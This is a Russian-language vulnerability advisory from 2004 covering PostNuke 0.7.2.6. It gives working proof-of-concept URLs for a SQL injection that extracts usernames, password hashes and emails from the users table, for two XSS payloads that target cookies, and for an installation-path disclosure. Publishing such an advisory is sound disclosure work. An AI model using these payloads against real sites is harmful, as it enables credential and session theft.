Несколько уязвимостей в PostNuke

Дата публикации:
19.04.2004
Дата изменения:
17.10.2006
Всего просмотров:
1401
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PostNuke 0.7.2.6

Описание: Несколько уязвимостей обнаружено в PostNuke. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. Удаленный пользователь может определить инсталляционный путь.

1. SQL инъекция:

http://localhost/postnuke0726/modules.php?op=mo dload&name=
NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0
&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null ,null%20
FROM%20nuke_users%20WHERE%20pn_uid=2/*
2.XSS:
http://localhost/postnuke0726/modules.php?op=modload&name=
NS-Polls&file=index&req=results&pollID=2&mode=thread&
order=ppp><s%00cript>alert(document.cookie);</s%00cript>ppp&thold=99


http://localhost/postnuke0726/modules.php?op=m odload&
name=NS-Polls&file=index&req=results&pollID=2&
mode=thread&order=ppp><body%20onload=alert(document.cookie);
2. Раскрытие инсталляционного пути:
http://localhost/postnuke0726/admin.php?module=Past_Nuke&op =deleteNotice

URL производителя:http://www.postnuke.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [waraxe-2004-SA#020 - Multiple vulnerabilities in PostNuke 0.726 Phoenix]

или введите имя

CAPTCHA